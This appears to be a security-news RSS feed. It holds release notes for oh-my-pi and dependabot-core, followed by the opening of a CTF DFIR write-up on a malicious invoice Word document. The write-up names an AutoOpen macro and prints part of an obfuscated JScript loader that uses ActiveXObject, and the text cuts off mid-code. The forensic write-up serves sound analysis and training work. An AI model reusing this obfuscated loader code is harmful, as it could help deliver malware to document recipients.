<h3>Added</h3>
<ul>
<li>Added <code>\tfrac</code> support to stacked display-math rendering so it now displays as a vertical fraction in <code>latexToBlock</code> output</li>
<li>Added markdown parsing for own-line display-math blocks (<code>$$...$$</code> and <code>\[...\]</code>) and delimiter-free <code>\begin{...}...\end{...}</code> math environments so block equations render via LaTeX-to-Unicode</li>
<li>Added stacked rendering of display-math fractions (<code>\frac</code>, <code>\dfrac</code>, <code>\cfrac</code>): the numerator is drawn over a horizontal bar over the denominator, with surrounding terms and <code>align</code>/<code>equation</code>-style environment rows aligned to the bar. Triggered for own-line <code>$$</code>/<code>\[</code> blocks, bare <code>\begin{...}</code> environments, and a paragraph whose sole content is a single display-math span; inline <code>$...$</code> fractions stay single-line (<code>½</code>, <code>(a+b)/c</code>)</li>
<li>Added bare math auto-rendering in <code>renderMathInText</code> for math-shaped lines and math environment blocks that omit <code>$</code>/<code>\(</code> delimiters</li>
<li>Added LaTeX-to-Unicode rendering for markdown math spans, converting <code>$$...$$</code>, <code>$...$</code>, <code>\(...\)</code>, and <code>\[...\]</code> into readable Unicode in Markdown output</li>
<li>Exported LaTeX conversion helpers from the package entrypoint so consumers can call <code>latexToUnicode</code>, <code>latexToBlock</code>, <code>renderMathInText</code>, <code>inlineMathSpanEnd</code>, and <code>isBareMathEnvironment</code> directly</li>
<li>Expanded LaTeX-to-Unicode conversion coverage for additional math fonts, delimiters, extensible arrows, layout environments, cancel/brace annotations, references, and AMS symbols</li>
<li>Added ANSI color rendering for LaTeX <code>\textcolor</code>, scoped <code>\color</code>, <code>\colorbox</code>, and <code>\fcolorbox</code>, including xcolor/CSS color parsing and truecolor/256-color terminal output</li>
<li>Added an optional <code>maxWidth</code> parameter to <code>MarkdownTheme.resolveMermaidAscii</code> to allow diagram resolvers to fit ASCII output to the available content width</li>
</ul>
<h3>Changed</h3>
<ul>
<li>Changed markdown math rendering to preserve multiline layout for display equations, keeping <code>\\</code> row breaks as separate output lines (including inside list items)</li>
</ul>
<h3>Fixed</h3>
<ul>
<li>Fixed <code>alignat</code>/<code>alignedat</code>/<code>gatheredat</code> rendering in <code>latexToBlock</code> so the required <code>{n}</code> preamble is not rendered as visible math content</li>
<li>Fixed math parsing to leave non-math LaTeX snippets (for example <code>\begin{itemize}</code>) and fenced code blocks as literal text instead of rendering them as math</li>
<li>Fixed <code>renderInlineMarkdown</code> to handle top-level display-math tokens so raw <code>$$...$$</code> delimiters are no longer leaked</li>
<li>Fixed inline math span detection so escaped dollars and currency-like patterns (such as <code>$5</code> and <code>$10</code>) are not converted as math</li>
<li>Fixed Mermaid diagram rendering in Markdown code blocks to clip each ASCII line to content width before wrapping, preventing preformatted diagram rows from fragmenting</li>
<li>Fixed fullscreen overlays losing keyboard focus to hidden prompt surfaces, which could make settings unresponsive while a background approval request was pending (<a href="https://github.com/can1357/oh-my-pi/issues/2789" data-hovercard-type="issue" data-hovercard-url="/can1357/oh-my-pi/issues/2789/hovercard">#2789</a>).</li>
<li>Fixed <code>bun test</code> runs inside a real terminal leaking TUI output: <code>ProcessTerminal</code> now honors a headless test-runtime default, so frame paints, <code>start()</code> capability probes (OSC 11 / DA1 / kitty), the progress keepalive, notifications, and teardown escapes no longer reach the developer's terminal, and stdin raw mode is never engaged. Previously <code>#safeWrite</code> only skipped on <code>!process.stdout.isTTY</code>, so a developer running the suite in an interactive terminal saw stray status/editor boxes and probe queries. Terminal-contract suites opt back into real I/O via <code>setTerminalHeadless(false)</code></li>
</ul>
<h2>@oh-my-pi/pi-utils</h2>
<h3>Added</h3>
<ul>
<li>Added <code>escapeXmlText</code> utility to escape XML-significant characters <code>&amp;</code>, <code>&lt;</code>, and <code>&gt;</code> in element body text</li>
<li>Added <code>isTerminalHeadless()</code> / <code>setTerminalHeadless()</code> to centrally suppress real-terminal side effects (stdout escape/frame writes, stdin raw mode, CSI/OSC capability probes, SIGWINCH, window-title changes, emergency restore) under the test runtime. Defaults on when <code>bun test</code> sets <code>NODE_ENV=test</code>; terminal-contract tests opt out via <code>setTerminalHeadless(false)</code></li>
</ul>
<h2>What's Changed</h2>
<ul>
<li>fix(tui): keep overlay focus above hidden prompts by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/roboomp/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/roboomp">@roboomp</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4676940403" data-permission-text="Title is private" data-url="https://github.com/can1357/oh-my-pi/issues/2795" data-hovercard-type="pull_request" data-hovercard-url="/can1357/oh-my-pi/pull/2795/hovercard" href="https://github.com/can1357/oh-my-pi/pull/2795">#2795</a></li>
<li>fix(coding-agent): load discovered hook factories by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/roboomp/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/roboomp">@roboomp</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4677385980" data-permission-text="Title is private" data-url="https://github.com/can1357/oh-my-pi/issues/2798" data-hovercard-type="pull_request" data-hovercard-url="/can1357/oh-my-pi/pull/2798/hovercard" href="https://github.com/can1357/oh-my-pi/pull/2798">#2798</a></li>
<li>fix(cli): skip empty session persistence by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/roboomp/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/roboomp">@roboomp</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4677808827" data-permission-text="Title is private" data-url="https://github.com/can1357/oh-my-pi/issues/2804" data-hovercard-type="pull_request" data-hovercard-url="/can1357/oh-my-pi/pull/2804/hovercard" href="https://github.com/can1357/oh-my-pi/pull/2804">#2804</a></li>
<li>fix(coding-agent): prefer Codex default auth by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/roboomp/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/roboomp">@roboomp</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4678553738" data-permission-text="Title is private" data-url="https://github.com/can1357/oh-my-pi/issues/2810" data-hovercard-type="pull_request" data-hovercard-url="/can1357/oh-my-pi/pull/2810/hovercard" href="https://github.com/can1357/oh-my-pi/pull/2810">#2810</a></li>
<li>fix(coding-agent): expand local auto-thinking classifier budget by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/roboomp/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/roboomp">@roboomp</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4678723092" data-permission-text="Title is private" data-url="https://github.com/can1357/oh-my-pi/issues/2814" data-hovercard-type="pull_request" data-hovercard-url="/can1357/oh-my-pi/pull/2814/hovercard" href="https://github.com/can1357/oh-my-pi/pull/2814">#2814</a></li>
</ul>
<p><strong>Full Changelog</strong>: <a class="commit-link" href="https://github.com/can1357/oh-my-pi/compare/v16.0.2...v16.0.3"><tt>v16.0.2...v16.0.3</tt></a></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[v0.382.0]]></title>
<description><![CDATA[What's Changed

Add support for scope property in npm_registry credentials by @AbhishekBhaskar in #15219
uv: Remove dead add_auth_env_vars code and add credential matching diagnostics by @kbukum1 in #15209
Fix npm registry credential leak to sibling paths on the same host by @Copilot in #15248
Fi...]]></description>
<link>https://tsecurity.de/de/3600332/it-security-tools/v03820/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3600332/it-security-tools/v03820/</guid>
<pubDate>Tue, 16 Jun 2026 00:44:42 +0200</pubDate>
<category>💾 IT Security Tools</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<h2>What's Changed</h2>
<ul>
<li>Add support for <code>scope</code> property in <code>npm_registry</code> credentials by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/AbhishekBhaskar/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/AbhishekBhaskar">@AbhishekBhaskar</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4586410424" data-permission-text="Title is private" data-url="https://github.com/dependabot/dependabot-core/issues/15219" data-hovercard-type="pull_request" data-hovercard-url="/dependabot/dependabot-core/pull/15219/hovercard" href="https://github.com/dependabot/dependabot-core/pull/15219">#15219</a></li>
<li>uv: Remove dead add_auth_env_vars code and add credential matching diagnostics by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/kbukum1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/kbukum1">@kbukum1</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4575909088" data-permission-text="Title is private" data-url="https://github.com/dependabot/dependabot-core/issues/15209" data-hovercard-type="pull_request" data-hovercard-url="/dependabot/dependabot-core/pull/15209/hovercard" href="https://github.com/dependabot/dependabot-core/pull/15209">#15209</a></li>
<li>Fix npm registry credential leak to sibling paths on the same host by @Copilot in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4612891175" data-permission-text="Title is private" data-url="https://github.com/dependabot/dependabot-core/issues/15248" data-hovercard-type="pull_request" data-hovercard-url="/dependabot/dependabot-core/pull/15248/hovercard" href="https://github.com/dependabot/dependabot-core/pull/15248">#15248</a></li>
<li>Fix pnpm lockfileVersion 9.0 parsing error with optional chaining by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/markhallen/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/markhallen">@markhallen</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3822459028" data-permission-text="Title is private" data-url="https://github.com/dependabot/dependabot-core/issues/13959" data-hovercard-type="pull_request" data-hovercard-url="/dependabot/dependabot-core/pull/13959/hovercard" href="https://github.com/dependabot/dependabot-core/pull/13959">#13959</a></li>
<li>Parse remaining Job collections into typed structs by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/JamieMagee/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/JamieMagee">@JamieMagee</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4624729290" data-permission-text="Title is private" data-url="https://github.com/dependabot/dependabot-core/issues/15262" data-hovercard-type="pull_request" data-hovercard-url="/dependabot/dependabot-core/pull/15262/hovercard" href="https://github.com/dependabot/dependabot-core/pull/15262">#15262</a></li>
<li>Add a typed Hash subclass for requirement entries by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/JamieMagee/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/JamieMagee">@JamieMagee</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4624731307" data-permission-text="Title is private" data-url="https://github.com/dependabot/dependabot-core/issues/15263" data-hovercard-type="pull_request" data-hovercard-url="/dependabot/dependabot-core/pull/15263/hovercard" href="https://github.com/dependabot/dependabot-core/pull/15263">#15263</a></li>
<li>Fix Gradle wrapper jar encoding by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/kbukum1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/kbukum1">@kbukum1</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4600057139" data-permission-text="Title is private" data-url="https://github.com/dependabot/dependabot-core/issues/15235" data-hovercard-type="pull_request" data-hovercard-url="/dependabot/dependabot-core/pull/15235/hovercard" href="https://github.com/dependabot/dependabot-core/pull/15235">#15235</a></li>
<li>fix(maven): handle <code>.target</code> updates in file updater by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/thavaahariharangit/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/thavaahariharangit">@thavaahariharangit</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4632527832" data-permission-text="Title is private" data-url="https://github.com/dependabot/dependabot-core/issues/15270" data-hovercard-type="pull_request" data-hovercard-url="/dependabot/dependabot-core/pull/15270/hovercard" href="https://github.com/dependabot/dependabot-core/pull/15270">#15270</a></li>
<li>Default all Cargo crates to increase-if-necessary by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/JamieMagee/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/JamieMagee">@JamieMagee</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4005600849" data-permission-text="Title is private" data-url="https://github.com/dependabot/dependabot-core/issues/14306" data-hovercard-type="pull_request" data-hovercard-url="/dependabot/dependabot-core/pull/14306/hovercard" href="https://github.com/dependabot/dependabot-core/pull/14306">#14306</a></li>
<li>Improve handling of Python failures when insecure-external-code-execution: deny is set, Tidier summary output by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/brrygrdn/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/brrygrdn">@brrygrdn</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4631921888" data-permission-text="Title is private" data-url="https://github.com/dependabot/dependabot-core/issues/15269" data-hovercard-type="pull_request" data-hovercard-url="/dependabot/dependabot-core/pull/15269/hovercard" href="https://github.com/dependabot/dependabot-core/pull/15269">#15269</a></li>
<li>Type updated_requirements as DependencyRequirement across all ecosystems by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/JamieMagee/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/JamieMagee">@JamieMagee</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4635104347" data-permission-text="Title is private" data-url="https://github.com/dependabot/dependabot-core/issues/15272" data-hovercard-type="pull_request" data-hovercard-url="/dependabot/dependabot-core/pull/15272/hovercard" href="https://github.com/dependabot/dependabot-core/pull/15272">#15272</a></li>
<li>Remove T.untyped from four common files by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/JamieMagee/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/JamieMagee">@JamieMagee</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4644349495" data-permission-text="Title is private" data-url="https://github.com/dependabot/dependabot-core/issues/15278" data-hovercard-type="pull_request" data-hovercard-url="/dependabot/dependabot-core/pull/15278/hovercard" href="https://github.com/dependabot/dependabot-core/pull/15278">#15278</a></li>
<li>Type create_dependency_file with keyword arguments by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/JamieMagee/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/JamieMagee">@JamieMagee</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4644386712" data-permission-text="Title is private" data-url="https://github.com/dependabot/dependabot-core/issues/15279" data-hovercard-type="pull_request" data-hovercard-url="/dependabot/dependabot-core/pull/15279/hovercard" href="https://github.com/dependabot/dependabot-core/pull/15279">#15279</a></li>
<li>Remove T.untyped from three updater files by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/JamieMagee/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/JamieMagee">@JamieMagee</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4644996248" data-permission-text="Title is private" data-url="https://github.com/dependabot/dependabot-core/issues/15281" data-hovercard-type="pull_request" data-hovercard-url="/dependabot/dependabot-core/pull/15281/hovercard" href="https://github.com/dependabot/dependabot-core/pull/15281">#15281</a></li>
<li>fix(npm_and_yarn): prefer replaces-base registry over lockfile source for metadata fetches by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/thavaahariharangit/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/thavaahariharangit">@thavaahariharangit</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4641938644" data-permission-text="Title is private" data-url="https://github.com/dependabot/dependabot-core/issues/15273" data-hovercard-type="pull_request" data-hovercard-url="/dependabot/dependabot-core/pull/15273/hovercard" href="https://github.com/dependabot/dependabot-core/pull/15273">#15273</a></li>
<li>Type DependencyFile#to_h and Notice#to_hash serialization hashes by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/JamieMagee/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/JamieMagee">@JamieMagee</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4646151579" data-permission-text="Title is private" data-url="https://github.com/dependabot/dependabot-core/issues/15283" data-hovercard-type="pull_request" data-hovercard-url="/dependabot/dependabot-core/pull/15283/hovercard" href="https://github.com/dependabot/dependabot-core/pull/15283">#15283</a></li>
<li>Type parse_dep_string return in bundler and npm_and_yarn by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/JamieMagee/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/JamieMagee">@JamieMagee</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4646203297" data-permission-text="Title is private" data-url="https://github.com/dependabot/dependabot-core/issues/15284" data-hovercard-type="pull_request" data-hovercard-url="/dependabot/dependabot-core/pull/15284/hovercard" href="https://github.com/dependabot/dependabot-core/pull/15284">#15284</a></li>
<li>Type registry_parser, git_pin_replacer, and drop stale pnpm entry by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/JamieMagee/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/JamieMagee">@JamieMagee</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4646254568" data-permission-text="Title is private" data-url="https://github.com/dependabot/dependabot-core/issues/15286" data-hovercard-type="pull_request" data-hovercard-url="/dependabot/dependabot-core/pull/15286/hovercard" href="https://github.com/dependabot/dependabot-core/pull/15286">#15286</a></li>
<li>Type python requirement_parser and pip_compile_files by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/JamieMagee/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/JamieMagee">@JamieMagee</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4646328745" data-permission-text="Title is private" data-url="https://github.com/dependabot/dependabot-core/issues/15287" data-hovercard-type="pull_request" data-hovercard-url="/dependabot/dependabot-core/pull/15287/hovercard" href="https://github.com/dependabot/dependabot-core/pull/15287">#15287</a></li>
<li>Type parse_dep_string return in cargo and pub by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/JamieMagee/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/JamieMagee">@JamieMagee</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4646362908" data-permission-text="Title is private" data-url="https://github.com/dependabot/dependabot-core/issues/15288" data-hovercard-type="pull_request" data-hovercard-url="/dependabot/dependabot-core/pull/15288/hovercard" href="https://github.com/dependabot/dependabot-core/pull/15288">#15288</a></li>
<li>Remove stale ForbidTUntyped entries for eight update checkers by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/JamieMagee/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/JamieMagee">@JamieMagee</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4651686773" data-permission-text="Title is private" data-url="https://github.com/dependabot/dependabot-core/issues/15297" data-hovercard-type="pull_request" data-hovercard-url="/dependabot/dependabot-core/pull/15297/hovercard" href="https://github.com/dependabot/dependabot-core/pull/15297">#15297</a></li>
<li>Type Prism AST node parameters in bundler finders by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/JamieMagee/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/JamieMagee">@JamieMagee</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4651830589" data-permission-text="Title is private" data-url="https://github.com/dependabot/dependabot-core/issues/15299" data-hovercard-type="pull_request" data-hovercard-url="/dependabot/dependabot-core/pull/15299/hovercard" href="https://github.com/dependabot/dependabot-core/pull/15299">#15299</a></li>
<li>Introduce typed GitTagDetails for GitCommitChecker local-tag shape by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/JamieMagee/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/JamieMagee">@JamieMagee</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4652028155" data-permission-text="Title is private" data-url="https://github.com/dependabot/dependabot-core/issues/15300" data-hovercard-type="pull_request" data-hovercard-url="/dependabot/dependabot-core/pull/15300/hovercard" href="https://github.com/dependabot/dependabot-core/pull/15300">#15300</a></li>
<li>Type requirements parameters as DependencyRequirement in gradle and cargo by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/JamieMagee/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/JamieMagee">@JamieMagee</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4652129343" data-permission-text="Title is private" data-url="https://github.com/dependabot/dependabot-core/issues/15302" data-hovercard-type="pull_request" data-hovercard-url="/dependabot/dependabot-core/pull/15302/hovercard" href="https://github.com/dependabot/dependabot-core/pull/15302">#15302</a></li>
<li>Type go_modules requirement parsing and version comparison by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/JamieMagee/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/JamieMagee">@JamieMagee</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4652184844" data-permission-text="Title is private" data-url="https://github.com/dependabot/dependabot-core/issues/15303" data-hovercard-type="pull_request" data-hovercard-url="/dependabot/dependabot-core/pull/15303/hovercard" href="https://github.com/dependabot/dependabot-core/pull/15303">#15303</a></li>
<li>Clarify npm security update failure messages by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/thavaahariharangit/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/thavaahariharangit">@thavaahariharangit</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4649863937" data-permission-text="Title is private" data-url="https://github.com/dependabot/dependabot-core/issues/15294" data-hovercard-type="pull_request" data-hovercard-url="/dependabot/dependabot-core/pull/15294/hovercard" href="https://github.com/dependabot/dependabot-core/pull/15294">#15294</a></li>
<li>Bump the regclient group across 1 directory with 2 updates by <a class="user-mention notranslate" data-hovercard-type="organization" data-hovercard-url="/orgs/dependabot/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/dependabot">@dependabot</a>[bot] in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4291345085" data-permission-text="Title is private" data-url="https://github.com/dependabot/dependabot-core/issues/14769" data-hovercard-type="pull_request" data-hovercard-url="/dependabot/dependabot-core/pull/14769/hovercard" href="https://github.com/dependabot/dependabot-core/pull/14769">#14769</a></li>
<li>Fix CHECKSUMS header being stripped when removing bundler 4.0.x entry (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4563551780" data-permission-text="Title is private" data-url="https://github.com/dependabot/dependabot-core/issues/15193" data-hovercard-type="issue" data-hovercard-url="/dependabot/dependabot-core/issues/15193/hovercard" href="https://github.com/dependabot/dependabot-core/issues/15193">#15193</a>) by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jmgarnier/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jmgarnier">@jmgarnier</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4596366243" data-permission-text="Title is private" data-url="https://github.com/dependabot/dependabot-core/issues/15229" data-hovercard-type="pull_request" data-hovercard-url="/dependabot/dependabot-core/pull/15229/hovercard" href="https://github.com/dependabot/dependabot-core/pull/15229">#15229</a></li>
<li>Bump bundled Deno to 2.8.3 for lockfile v5 support by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/markhallen/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/markhallen">@markhallen</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4663689963" data-permission-text="Title is private" data-url="https://github.com/dependabot/dependabot-core/issues/15319" data-hovercard-type="pull_request" data-hovercard-url="/dependabot/dependabot-core/pull/15319/hovercard" href="https://github.com/dependabot/dependabot-core/pull/15319">#15319</a></li>
<li>Add Deno workspace support by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/markhallen/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/markhallen">@markhallen</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4664345993" data-permission-text="Title is private" data-url="https://github.com/dependabot/dependabot-core/issues/15322" data-hovercard-type="pull_request" data-hovercard-url="/dependabot/dependabot-core/pull/15322/hovercard" href="https://github.com/dependabot/dependabot-core/pull/15322">#15322</a></li>
<li>Bump golang.org/x/mod from 0.33.0 to 0.37.0 in /go_modules/helpers by <a class="user-mention notranslate" data-hovercard-type="organization" data-hovercard-url="/orgs/dependabot/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/dependabot">@dependabot</a>[bot] in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4659727498" data-permission-text="Title is private" data-url="https://github.com/dependabot/dependabot-core/issues/15314" data-hovercard-type="pull_request" data-hovercard-url="/dependabot/dependabot-core/pull/15314/hovercard" href="https://github.com/dependabot/dependabot-core/pull/15314">#15314</a></li>
<li>v0.382.0 by @dependabot-core-action-automation[bot] in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4661507791" data-permission-text="Title is private" data-url="https://github.com/dependabot/dependabot-core/issues/15317" data-hovercard-type="pull_request" data-hovercard-url="/dependabot/dependabot-core/pull/15317/hovercard" href="https://github.com/dependabot/dependabot-core/pull/15317">#15317</a></li>
</ul>
<h2>New Contributors</h2>
<ul>
<li><a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jmgarnier/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jmgarnier">@jmgarnier</a> made their first contribution in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4596366243" data-permission-text="Title is private" data-url="https://github.com/dependabot/dependabot-core/issues/15229" data-hovercard-type="pull_request" data-hovercard-url="/dependabot/dependabot-core/pull/15229/hovercard" href="https://github.com/dependabot/dependabot-core/pull/15229">#15229</a></li>
</ul>
<p><strong>Full Changelog</strong>: <a class="commit-link" href="https://github.com/dependabot/dependabot-core/compare/v0.381.0...v0.382.0"><tt>v0.381.0...v0.382.0</tt></a></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Connectors CTF 2025 — DFIR Challenges]]></title>
<description><![CDATA[Connectors CTF 2025 — DFIR ChallengesHappy to share my write-up for solving 3/3 DFIR challenges from CONCTF 2025. Although I didn’t attend the finals, I successfully completed all the DFIR challenges independently.You can read this writeup on my GitBook account Linkwe got a malicious document fil...]]></description>
<link>https://tsecurity.de/de/3599549/hacking/connectors-ctf-2025-dfir-challenges/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3599549/hacking/connectors-ctf-2025-dfir-challenges/</guid>
<pubDate>Mon, 15 Jun 2026 17:25:58 +0200</pubDate>
<category>🕵️ Hacking</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<h3>Connectors CTF 2025 — DFIR Challenges</h3><p>Happy to share my write-up for solving 3/3 DFIR challenges from CONCTF 2025. Although I didn’t attend the finals, I successfully completed all the DFIR challenges independently.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/625/1*WyIIfVXGPElMGl0YRvDHFg.png"></figure><blockquote>You can read this writeup on my GitBook account <a href="https://prankster.gitbook.io/prankster/ctf-writeups/connectors-ctf-2025-dfir-challenges">Link</a></blockquote><figure><img alt="" src="https://cdn-images-1.medium.com/max/742/1*O4JQA6b57h60QJkYm_TK1g.png"></figure><p>we got a malicious document file, have macros and other stuff.</p><p>first step is to extract the document file “<strong><em>Invoice_Q1–2021.doc</em></strong>” as any other zip, rar file:</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/774/1*Q2u-Q9rehyBIvm8DwF4dSA.png"></figure><p>and so on. after extracting the file, we can view all malicious stuff.</p><p>starting with “<strong><em>Invoice_Q1–2021\word\vbaData.xml</em></strong>” file, we can get the full MacroName, which is “<strong>PROJECT.AYAIQ5.AUTOOPEN</strong>”</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*1OEuFE1f1Dio7hKjRzgDFQ.png"></figure><p>moving on another “<strong><em>Invoice_Q1–2021\word\document.xml</em></strong>” we can see a lot of malicious stuff, that needs more investigation:</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*NED9wdtibTDlUjM5304Z9g.png"></figure><pre>&lt;w:t&gt;&lt;html&gt;&lt;body&gt;&lt;div id="content"&gt;hello&lt;/div&gt;&lt;script language="javascript"&gt;var aWKdF = "a9oLN";function aUgasq(awFTPc){var aD07t = "a0EKB";acWBi = aD07t.toLowerCase();var aPWzqv = false;var aD0Mks = -41878;return(new ActiveXObject(awFTPc));}ae1Al = -8406;var azd3Iw = -28262;abKXU = "aYUGr";function aUrMf(aQPiI){var e={},i,b=0,c,x,l=0,a,a8qHR="",w=String.fromCharCode,L=aQPiI.length;var 